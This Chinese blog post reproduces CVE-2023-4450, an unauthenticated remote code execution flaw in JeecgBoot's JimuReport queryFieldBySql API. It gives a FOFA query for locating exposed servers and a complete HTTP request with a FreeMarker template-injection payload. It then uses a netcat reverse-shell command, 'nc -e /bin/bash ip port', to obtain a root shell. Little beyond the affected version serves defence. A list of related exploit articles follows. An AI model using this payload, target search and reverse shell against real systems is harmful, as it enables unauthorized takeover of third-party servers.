jeect-boot queryFieldBySql接口RCE漏洞(CVE-2023-4450)复现

最新推荐文章于 2024-07-17 23:48:30 发布
最新推荐文章于 2024-07-17 23:48:30 发布
阅读量3.5k 收藏 6
点赞数 5
分类专栏: 漏洞复现 文章标签: 漏洞复现 jeect-boot rce漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiayu729100940/article/details/136847745
版权

jeect-boot积木报表由于未授权的 API /jmreport/queryFieldBySql 使用了 freemarker 解析 SQL 语句从而导致了 RCE 漏洞的产生。

1.漏洞级别

高危

2.漏洞搜索

fofa

app="Jeecg-Boot 企业级快速开发平台"

3.影响范围

JimuReport < 1.6.1

4.漏洞复现

这个漏洞的注入点就在于/jeecg-boot/jmreport/queryFieldBySql 且无需用户授权即可执行
构造数据包

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/2
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip, deflate, br
Accept: */*
Content-Type: application/json
Content-Length: 102

{"sql":"select '<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ ex(\"whoami  \") }' "}

如果漏洞存在,则会出现以下内容:
在这里插入图片描述
如果命令失败则会显示:
在这里插入图片描述
漏洞相对简单,到这里就复现成功了。

4.2 进一步利用

如果想要进一步rce的话,可以通过nc的方法来反弹shell,执行

nc -e /bin/bash ip port

在这里插入图片描述
远程服务器执行,即可正常获取shell

nc -lvp 8888

成功getsshell,root权限
在这里插入图片描述

fly夏天
关注
  • 5
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 13
    评论
专栏目录
jeecg-boot queryFieldBySql接口基于SSTI的任意代码执行漏洞复现 [附POC]
薛定谔嘚喵博客
12-10 405
JeecgBoot 受影响版本中由于积木报表 /jeecg-boot/jmreport/queryFieldBySql Api接口未进行身份校验,使用 Freemarker 处理用户用户传入的 sql 参数,未经授权的攻击者可发送包含恶意 sql 参数的 http 请求,通过 SSTI 在应用端执行任意代码。
JeecgBoot JimuReport testConnection RCE漏洞复现
0xSec
12-12 1700
JeecgBootjeecg-boot/jmreport/testConnection 未进行身份验证,并且未对 dbUrl 参数进行限制,当应用端存在H2数据库驱动依赖时,攻击者发送包含恶意 dbUrl 参数的 http 请求远程执行任意代码。
【春秋云境】CVE-2023-4450 jeect-boot queryFieldBySql接口RCE漏洞
HMX404的博客
04-15 937
JeecgBoot 是一个开源的低代码开发平台,Jimureport 是低代码报表组件之一。当前漏洞在 1.6.1 以下的 Jimureport 组件库中都存在,由于未授权的 API使用了 freemarker 解析 SQL 语句从而导致了 RCE 漏洞的产生。
JeecgBoot jmreport/loadTableData 积木报表漏洞RCE(CVE-2023-4450)漏洞
由入门到精通
07-05 193
Jeecg Boot jmreport/loadTableData接口存在FreeMarker SSTI注入漏洞,攻击者可以通过操纵应用程序的模板引擎来执行恶意代码或获取敏感信息由于未授权的 API使用了 freemarker 解析 SQL 语句从而导致了 RCE 漏洞的产生。
漏洞复现Jeecg-boot SQL注入/命令执行
qq_45276174的博客
05-14 873
【代码】【漏洞复现Jeecg-boot SQL注入/命令执行。
漏洞复现JeecgBoot-queryFieldBySql-远程命令执行漏洞
Nday_Seeker
03-18 1128
Jeecg-Boot中存在SQL注入漏洞,远程未授权攻击者可通过report/jeecgboot/jmreport/queryFieldBySql端点来执行任意SQL语句,最终可能导致敏感信息泄露等。
JeecgBoot jmreport/queryFieldBySql RCE漏洞复现
0xSec
12-12 2202
Jeecg Boot jmreport/queryFieldBySql接口存在代码执行漏洞,攻击者可以通过操纵应用程序的模板引擎来执行恶意代码或获取敏感信息。这种漏洞可能会导致整个应用程序被入侵,造成严重的安全问题。
漏洞复现JeecgBoot-qurestSql-SQL注入漏洞
Nday_Seeker
03-18 1630
jeecg-boot 3.5.0版本存在SQL注入漏洞,该漏洞源于文件 jmreport/qurestSql 存在安全问题, 通过参数 apiSelectId 导致SQL注入。
[漏洞复现]JeecgBoot queryFieldBySql注入内存马利用及JDBC RCE复现
LiangYueSec的博客
07-02 914
[漏洞复现]JeecgBoot queryFieldBySql注入内存马利用及JDBC RCE复现
JeecgBoot jmreport/loadTableData RCE漏洞复现(CVE-2023-41544)
0xSec
01-31 1182
JeecgBootjmreport/loadTableData接口存在FreeMarker SSTI注入漏洞,攻击者可以通过操纵应用程序的模板引擎来执行恶意代码或获取敏感信息。这种漏洞可能会导致整个应用程序被入侵,造成严重的安全问题。
jeect-boot RCE漏洞CVE-2023-4450
最新发布
zneVue
07-17 484
JeecgBoot 是一个开源的低代码开发平台,Jimureport 是低代码报表组件之一。当前漏洞在 1.6.1 以下的 Jimureport 组件库中都存在,由于未授权的 API`/jmreport/queryFieldBySql`使用了 freemarker 解析 SQL 语句从而导致了 RCE 漏洞的产生。
JEECGBOOT代码SQL漏洞处理方案.zip
06-21
漏洞编码:HW21-0499 产品名字:JeecgBoot低代码平台 问题: JEECG系统存在SQL注入0day漏洞
CVE-2020-35728:CVE-2020-35728 和 Jackson-databind RCE
05-31
如何RCE pom.xml <?xml version="1.0" encoding="UTF-8"?> <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http:
CVE-2020-36179:CVE-2020-36179~82 Jackson-databind SSRF&RCE
05-29
描述CVE-2020-36179:2.9.10.8之前的FasterXML jackson-databind 2.x处理与oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS相关的序列化小工具和键入之间的交互。 CVE-2020-36180:FasterXML jackson-...
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
向日葵RCE漏洞(CNVD-2022-10270)检测工具
02-19
向日葵RCE漏洞(CNVD-2022-10270)检测工具,已经编译好,命令行运行即可 xrkrce.exe -h 127.0.0.1
漏洞复现--JeecgBoot testConnection 远程代码执行
qq_53003652的博客
12-20 2777
JeecgBoot 是一款基于代码生成器的低代码开发平台,该产品存在testConnection 远程命令执行漏洞JeecgBoot积木报表。
JeecgBootSql二次注入复现
weixin_45803562的博客
03-23 1375
漏洞复现
致远m3-server反序列化rce漏洞复现
12-22
致远m3-server存在反序列化RCE漏洞,攻击者可以利用此漏洞在远程服务器上执行恶意代码。为了复现这个漏洞,我们可以按照以下步骤进行: 1. 确认漏洞版本:首先需要确定目标服务器上的致远m3-server版本是否存在漏洞。可以通过查看官方公告或漏洞报告来确认。 2. 搭建测试环境:在本地搭建一个与目标服务器相似的测试环境,可以使用虚拟机或Docker等工具来模拟目标服务器环境。 3. 准备利用工具:准备一个适用于该漏洞的利用工具,例如ysoserial等,用于构造恶意的反序列化payload。 4. 发起攻击:利用准备好的利用工具构造恶意payload,然后向目标服务器发送恶意请求,触发漏洞并执行恶意代码。 5. 验证漏洞利用:在攻击成功后,可以通过查看服务器日志或执行一些系统命令来验证是否成功执行了恶意代码。 6. 报告漏洞:一旦成功复现漏洞,需要及时向致远m3-server的官方或相关安全机构报告漏洞细节,以便及时修复和防范。 总的来说,复现致远m3-server反序列化RCE漏洞需要仔细分析漏洞利用的过程,同时要遵守相关法律法规,不得在未经授权的情况下攻击他人系统。
评论 13
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值